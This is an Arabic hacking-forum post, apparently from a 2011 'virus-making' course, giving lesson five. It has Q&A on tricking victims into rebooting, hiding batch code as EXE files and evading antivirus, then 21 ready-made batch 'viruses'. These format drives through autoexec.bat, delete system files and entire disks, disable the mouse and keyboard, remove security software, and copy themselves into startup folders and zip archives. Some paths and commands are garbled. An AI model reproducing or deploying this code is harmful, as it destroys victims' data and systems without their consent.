HaCkEr$ f0r SyR!A
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

HaCkEr$ f0r SyR!A

HaCkEr$ f0r SyR!A *^ منــــظمة القـــــــراصـــــنـــة الســـــــورية*^ HaCkEr$ f0r SyR!A
 
الرئيسيةأحدث الصورالتسجيلدخولبرامج بتحميل رائع

 

 الدرس الخامس 5

اذهب الى الأسفل 
كاتب الموضوعرسالة
Mr-Le0
Admin
Mr-Le0


المساهمات : 393
تاريخ التسجيل : 23/07/2011
العمر : 29
الموقع : http://jsoftj.fanbb.net/

الدرس الخامس 5 Empty
مُساهمةموضوع: الدرس الخامس 5   الدرس الخامس 5 Icon_minitimeالسبت أغسطس 13, 2011 6:00 pm

الدرس الخامس
الدرس دا شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :

س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :


كود PHP:
c:windowsrundll.exe user.exe,exitwindow***ec


ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
هذا كود الغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :



كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll.exe user.exe,exitwindow***ec

------------------------------------
.فيروس عمل فورمات C,D,E,F والطابعه :


كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat


------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :



كود PHP:
del C:WINDOWSNOTEPAD.EXE
copy %0 C:WINDOWSNOTPAD.EXE


------------------------------------

4.فايروس افتراضي :



كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end


------------------------------------
5.فايروس النظام :



كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end


------------------------------------
6.فايروس الدوس :



كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree


------------------------------------
7.فيروس قاتل ملفات السستم :



كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS


------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :



كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS


------------------------------------
9.فيروس يمنع استخدام خصائص الشاشة :



كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32.exe
cd
cd


------------------------------------
10.فيروس تدمير سطح المكتب :



كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd


------------------------------------
11.فيروس قاتل النورتن :



كود PHP:
@echo off
%WinDir%rundll.exe mouse,disable
%WinDir%rundll.exe keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y c:progra~1norton~1*.*
deltree /y d:progra~1norton~1*.*
deltree /y c:progra~1zonela~1*.*
deltree /y d:progra~1zonela~1*.*
cls


------------------------------------
12.فيروس التدمير :



كود PHP:
echo off@
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat
cls
puse


------------------------------------
13.فيروس يمحى جميع الملفات التى على الهارد :



كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*



------------------------------------
14.فيروس خاص :



كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys


------------------------------------

15.اهم فايروس فايروس مدمر :


كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat


------------------------------------
16.فيروس عمل فورمات للجهاز فورا :


كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat


------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :


كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys


------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره


@
كود PHP:
Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys


------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :


كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32.exe user.exe,exitwindows


------------------------------------
20.فيروس النسخ الالي :


@
كود PHP:
echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My ********s/virusautocopy.bat
end


------------------------------------
21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :


كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus Name:A7meedye
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32.exe | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
del:
deltree /y C:WINDOWS*.*
deltree /y C:Program Files*.*
deltree /y C:My ********s*.*
goto msg
msg:
NET SEND 127.0.0.1 you got a virus
goto start
:start
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
Start IExplorer "http://www.top-sec.com/vb
goto end
:end
cls
echo Im **** your computer
echo sorry about what my virus do but you are stuped
echo The Virus Made By A7meedye
puse


------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://ha-sy.forumc.net
 
الدرس الخامس 5
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» الدرس الخامس 5
» الدرس الخامس 5
» الدرس السادس 6
»  [ الدرس الخامس ] شرح عمــل حساب في no-ip (( أو )) dyndns [ من اهم الدروس ]
» الدرس الرابع

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
HaCkEr$ f0r SyR!A :: الدورات و الدروس الاحترافية(مرتبة) :: احتراف صنع الفيروسات-
انتقل الى: